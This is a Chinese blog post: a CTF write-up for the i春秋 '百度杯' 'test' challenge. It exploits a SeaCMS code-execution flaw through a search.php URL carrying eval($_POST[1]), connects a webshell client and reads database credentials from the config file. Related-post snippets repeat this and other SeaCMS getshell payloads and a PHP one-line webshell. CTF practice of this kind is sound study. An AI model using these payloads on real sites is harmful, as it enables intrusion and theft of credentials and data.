CTF web之旅 7

最新推荐文章于 2021-10-23 22:27:49 发布
原创 最新推荐文章于 2021-10-23 22:27:49 发布 · 90 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

题目名称: 百度杯”CTF比赛 九月场 test

看了大佬的wp之后才知道是 海洋CMS漏洞

CMS就是内容管理系统

构造url

/search.php?searchtype=5&tid=&area=eval($_POST[1])

蚁剑连接 

 进去扒扒数据  找不到flag啊

在这个目录里看一下数据库配置信息 /var/www/html/data/common.inc.php

 给出了账户密码 那进一下数据库看一下

找到flag目录 执行后找到flag

i春秋 “百度杯”CTF比赛 九月场 Test
include_heqile的博客
09-17 1182
https://www.ichunqiu.com/battalion?t=1&r=0 这道题还是蛮不错的,下面我来说一下解题思路 首先进入题目链接,然后搜索seacms相关漏洞,我直接使用了百度出来的第一条,freebuf上的一篇文章: http://www.freebuf.com/vuls/150042.html 漏洞利用方式如下: 我们把eval改成system,把9[]...
CTF之旅CTFHub技能树+详细Write up+已完结)(Web前置技能)
weixin_51563603的博客
08-07 5408
CTFHub新手之旅 首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF,当时还在攻防世界上做了一些题目,但是后来有人跟 我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻防世界的意思,每个人有每个人的想法),后来也 因为学业较忙且基础太差无法开展此方面的学习,直到到了暑假,我自学完了一些编程语言包括Python、Java, 网页的前后端知识也有所了解后,我继续在CTFHub上了我的CTF之旅。 其实本人还是属于CTF小白,希望大家能够共同进步,那废话不多说开始看 Write Up 吧! We
海洋CMS6.28命令执行漏洞
番薯道长的博客
11-11 9056
0x00 代码审计 area参数处理过的地方经过字符是否非法判断之后,调用echoSearchPage()函数 area参数经过了检测是否是拼音之后 接下来到了 $content=$mainClassObj->parseSearchItemList($content,"area"); 因为能执行php代码一般就是eval()函数 搜索一下这个页
ctf记录
weixin_33709609的博客
11-10 260
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP构建一句话木马
diesha9164的博客
09-30 554
构建一句话木马,密码为simple:   url/search.php?searchtype=5&tid=&area=eval($_POST[simple]) 之后使用菜刀进行链接,密码为simple,获取网站目录shell。 转载于:https://www.cnblogs.com/AndyEvans/p/9733298.html...
i春秋 “百度杯”CTF比赛 九月场 YeserCMS
include_heqile的博客
09-08 1458
https://www.ichunqiu.com/battalion?t=1 首先说明一点,这题怒是我自己做出来的,我参考了很多博主的writeup,但是他们的writeup只是提示我应该去利用什么漏洞: https://www.w00yun.top/bugs/wooyun-2015-0137013.html 虽然知道了是这个漏洞,但是我不会利用,在这上面耗了很长时间,因为我直接把漏洞报...
CTF入门之旅(一)
qinyuehong的博客
02-23 359
我的CTF入门之旅(一) 题目是这个网址:http://123.206.87.240:8002/web5/ 打开网址题目是这样的,查看源代码,可以看到这是一道JS加密的题目,我用的是谷歌浏览器。右键之后点击查看源代码,得到如下图: 这道题目可以直接用浏览器的控制台解密,把模块中的源码复制到控制台中(谷歌浏览器的控制台可以在设置->更多工具->开发者工具) 点击回车,可以得到flag 将答案ctf{whatfk}输入,发现不对: 观察到题目中的字母都为大写,重新输入CTF{WHATFK}
精选资源
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的...通过这些图片,参赛者将踏上一段充满智慧和趣味的解谜之旅
CTFWEB入门的SQL注入web171
沐一 · 林 的博客
09-06 1109
CTFWEB入门的SQL注入web171 继续开启全栈梦想之逆向之旅~ 这题是 CTFWEB入门的SQL注入web171
CTF之旅CTFHub技能树+详细Write up+持续更新ing)(文件上传)
weixin_51563603的博客
10-23 4361
目录其他CTFHub题目WriteUP地址前言文件上传无验证 其他CTFHub题目WriteUP地址 本来不想分段的,但是后来发现要写的东西太多了,就分了几段写,大家见谅 1.web前置技能(已完结) 2.信息泄露(已完结) 3.密码口令+XSS(已完结) 前言 这里收录了我在CTFHub中做的题目和自己写的一些想法,首先我想稍微讲下个人经历,本人在今年寒假的时候初识CTF ,当时还在攻防世界上做了一些题目,但是后来有人跟我说攻防世界的题目比较老,建议我换个网站(这边没有诋毁攻 防世界的意思,每个人有每个
Web-Test[i春秋][50pt]
Laurel_60的博客
08-02 816
链接打开之后是一个海洋cms的网站。 emmm那我们就在网上搜一下海洋cms的漏洞。会搜索到有一个漏洞是- - /search.php?searchtype=5&tid=&area=eval($_POST[1]) 那就拿菜刀连上去。 看到这么多的文件夹,果断百度一下海洋的数据库配置文件的存储位置- - /data/common.inc.php 于是看到了...
seacms最新版前台getshell
weixin_34025051的博客
06-10 230
cms版本:6.45,这是做一道ctf题目遇到的 实际上知道漏洞之后,题目并不难,记录的原因是。。。。payload一句话花了我一个小时。。 orz,不知道在干嘛,就是一直不成功! 漏洞原文 直接说题目,有了poc之后,我们试着写进去一句话 根据poc构造我们的paylaod }{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end...
“百度杯”CTF比赛 九月场_Test(海洋cms前台getshell)
a173262565的博客
04-22 561
题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞: 海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了...
<?php eval($_POST[cmd]);?>…
热门推荐
senlin1202的博客
03-04 1万+
执行POST来的cmd参数语句,别人可以以任何内容提交,这个程序把提交的数据当PHP语句执行,利用这个功能可以查看甚至修改你的数据库数据和文件。使用的方法可以随便编写一个HTML来完成,例如: http://....../你的名字.php> //这里面写PHP程序,随便连接数据和修改文件都可以,当然也可以用下面的语句查看你的PHP源文件来获取数据库路径和密码 $str=f
i春秋CTF训练 Web Test
椰奶冻不安全的博客
07-05 1859
Web Test 题目内容:善于查资料,你就可以拿一血了。 题目链接请在i春秋申请 根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
基于改进YOLOv8算法实现高精度实时安全带使用状态智能监测与预警的深度学习目标检测系统源码及完整项目实践指南_包含2300张高质量标注图像的安全带专用数据集YOLOv8目标检测.zip
最新发布
12-06
基于改进YOLOv8算法实现高精度实时安全带使用状态智能监测与预警的深度学习目标检测系统源码及完整项目实践指南_包含2300张高质量标注图像的安全带专用数据集YOLOv8目标检测.zip
MiniBtMaster_minibt_16940_1764966207180.zip
12-06
MiniBtMaster_minibt_16940_1764966207180.zip
本项目是一个专为Linux系统设计的自动化安装与回滚管理工具集_它包含针对MySQL数据库Redis缓存服务器以及NginxWeb服务器的一键部署脚本_通过参数化命令实现快速安装与.zip
12-06
本项目是一个专为Linux系统设计的自动化安装与回滚管理工具集_它包含针对MySQL数据库Redis缓存服务器以及NginxWeb服务器的一键部署脚本_通过参数化命令实现快速安装与.zip
无线传感器网络(WSN)中的节能睡眠调度和基于树状的集群路由协议.zip
12-06
1.版本:matlab2014a/2019b/2024b 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
探索我的CTF挑战与信息安全之旅
1. Jeopardy(解题模式):参赛队伍在规定时间内解答尽可能多的题目,通常每个题目会有一个与之相关的flag。每答对一题,就能获得一定的分数。这种模式更侧重于考验参赛者的知识广度和深度。 2. Attack-Defense...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值